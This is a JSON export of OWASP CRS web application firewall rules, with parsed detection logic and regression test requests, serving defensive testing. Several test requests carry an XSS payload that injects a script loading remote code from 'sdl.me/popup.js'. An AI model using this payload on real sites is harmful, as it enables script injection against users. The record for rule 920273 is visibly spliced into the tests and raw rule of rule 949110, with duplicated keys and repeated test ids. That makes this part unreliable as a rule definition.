"", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1704 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Range", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Request-Range", "negated": false } ], "operator": { "type": "@rx", "argument": "^bytes=(?:(?:\\d+)?-(?:\\d+)?\\s*,?\\s*){6}", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1722, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Range", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Request-Range", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^bytes=(?:(?:\\d+)?-(?:\\d+)?\\s*,?\\s*){6}", "actions": [ { "act_name": "setvar", "lineno": 1723, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1722 } }, { "rule_id": "920273", "has_tests": true, "detection": { "variables": [ { "name": "ARGS", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "REQUEST_BODY", "part": "", "negated": false } ], "operator": { "type": "@validateByteRange", "argument": "38,44-46,48-58,61,65-90,95,97-122", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Invalid character in request (outside of very strict set)", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/4", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/?test=test1%20", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920273 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1%20" } ] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/?test=test1&test=t", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920273 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1&test=t" } ] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/index.html?test=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "setTimeout(\"top.frame2.location=\"javascript:(function+()+{var+x+=+document.createElement(\\\\\"script\\\\\");x.src+=+\\\\\"//sdl.me/popup.js?//\\\\\";document.childNodes\\\\[0\\\\].appendChild(x);}());\"\",1000)&//", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 949110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "input=setTimeout(\"top.frame2.location=\"javascript:(function+()+{var+x+=+document.createElement(\\\\\"script\\\\\");x.src+=+\\\\\"//sdl.me/popup.js?//\\\\\";document.childNodes\\\\[0\\\\].appendChild(x);}());\"\",1000)&//" } ] }, { "description": "Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered", "test_id": 2, "request": { "method": "GET", "uri": "/get", "headers": { "User-Agent": "OWASP CRS test agent", "Referer": "http://www.coreruleset.org", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 949110 ] }, "malicious_patterns": [] }, { "description": "Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered", "test_id": 3, "request": { "method": "OPTIONS", "uri": "/options", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 949110 ] }, "malicious_patterns": [] }, { "description": "Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered", "test_id": 4, "request": { "method": "REALLYLONGUNREALMETHOD", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 949110 ] }, "malicious_patterns": [] }, { "description": "Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly", "test_id": 5, "request": { "method": "GET", "uri": "/get/demo/xss/xml/vuln.xml.php?input=setTimeout(\"top.frame2.location=\"javascript:(function+()+{var+x+=+document.createElement(\\\\\"script\\\\\");x.src+=+\\\\\"//sdl.me/popup.js?//\\\\\";document.childNodes\\\\[0\\\\].appendChild(x);}());\"\",1000)&//", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "uri_params", "value": "input=setTimeout(\"top.frame2.location=\"javascript:(function+()+{var+x+=+document.createElement(\\\\\"script\\\\\");x.src+=+\\\\\"//sdl.me/popup.js?//\\\\\";document.childNodes\\\\[0\\\\].appendChild(x);}());\"\",1000)&//" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 225, "variables": [ { "variable": "TX", "variable_part": "BLOCKING_INBOUND_ANOMALY_SCORE", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@ge", "operator_argument": "%{tx.inbound_anomaly_score_threshold}", "actions": [ { "act_name": "id", "lineno": 226, "act_quote": "no_quote", "act_arg": "949110", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 227, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "deny", "lineno": 228, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 229, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 230, "act_quote": "quotes", "act_arg": "Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 231, "act_quote": "quotes", "act_arg": "anomaly-evaluation", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 232, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 233, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 225 } }, { "rule_id": "949011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 235, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 235, "act_quote": "no_quote", "act_arg": "949011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 235, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 235, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 235, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 235, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 235, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 235, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 235 } }, { "rule_id": "949012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 236, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 236, "act_quote": "no_quote", "act_arg": "949012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 236, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 236, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 236, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 236, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 236, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 236, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 236 } }, { "rule_id": "949013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 243, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 243, "act_quote": "no_quote", "act_arg": "949013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 243, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 243, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 243, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 243, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 243, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 243, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 243 } }, { "rule_id": "949014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 244, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 244, "act_quote": "no_quote", "act_arg": "949014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 244, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 244, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 244, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 244, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 244, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 244, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 244 } }, { "rule_id": "949015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 251, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 251, "act_quote": "no_quote", "act_arg": "949015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 251, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 251, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 251, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 251, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 251, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 251, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 251 } }, { "rule_id": "949016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 252, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 252, "act_quote": "no_quote", "act_arg": "949016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 252, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 252, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 252, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 252, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 252, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 252, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 252 } }, { "rule_id": "949017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 259, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 259, "act_quote": "no_quote", "act_arg": "949017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 259, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 259, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 259, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 259, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 259, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 259, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 259 } }, { "rule_id": "949018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 260, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 260, "act_quote": "no_quote", "act_arg": "949018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 260, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 260, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 260, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 260, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 260, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 260, "act_quote": "no_quote", "act_arg": "END-REQUEST-949-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 260 } }, { "rule_id": "922100", "has_tests": true, "detection": { "variables": [ { "name": "MULTIPART_PART_HEADERS", "part": "_charset_", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Multipart content type global _charset_ definition is not allowed by policy", "logdata": "Matched Data: %{ARGS._charset_}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-multipart-header" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-multipart-header", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/MULTIPART-ATTACK", "capec/1000/255/153" ] }, "test_cases": [ { "description": "Positive test: utf-7 is not in allowed charsets", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-7\n--boundary\nContent-disposition: form-data; name=\"positive\"\nContent-Type: text/plain\n\nLet me see if I can use utf-7.\n--boundary--\n" }, "expected": { "should_block": true, "rule_ids": [ 922100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-7\n--boundary\nContent-disposition: form-data; name=\"positive\"\nContent-Type: text/plain\n\nLet me see if I can use utf-7.\n--boundary--\n" } ] }, { "description": "Negative test: only allowed charsets when using _charset_", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-8\n--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain\n\nThis should be good as we use utf-8 that is allowed.\n--boundary--\n" }, "expected": { "should_block": false, "rule_ids": [ 922100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-8\n--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain\n\nThis should be good as we use utf-8 that is allowed.\n--boundary--\n" } ] }, { "description": "Positive test: don't allow substrings of valid charsets when using _charset_", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-\n--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain\n\nutf-8 is valid but utf- should not be.\n--boundary--\n" }, "expected": { "should_block": true, "rule_ids": [ 922100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-\n--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain\n\nutf-8 is valid but utf- should not be.\n--boundary--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 27, "variables": [ { "variable": "MULTIPART_PART_HEADERS", "variable_part": "_charset_", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "id", "lineno": 28, "act_quote": "no_quote", "act_arg": "922100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 29, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 30, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 31, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 32, "act_quote": "quotes", "act_arg": "Multipart content type global _charset_ definition is not allowed by policy", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 33, "act_quote": "quotes", "act_arg": "Matched Data: %{ARGS._charset_}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 34, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 35, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 36, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 37, "act_quote": "quotes", "act_arg": "attack-multipart-header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 38, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 39, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 40, "act_quote": "quotes", "act_arg": "OWASP_CRS/MULTIPART-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 41, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 42, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 43, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 44, "act_quote": "quotes", "act_arg": "tx.922100_charset=|%{ARGS._charset_}|", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 45, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 27 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "922100_CHARSET", "negated": false } ], "operator": { "type": "@within", "argument": "%{tx.allowed_request_content_type_charset}", "negated": true } }, "transformations": [ "lowercase" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 46, "variables": [ { "variable": "TX", "variable_part": "922100_CHARSET", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@within", "operator_argument": "%{tx.allowed_request_content_type_charset}", "actions": [ { "act_name": "t", "lineno": 47, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 48, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", 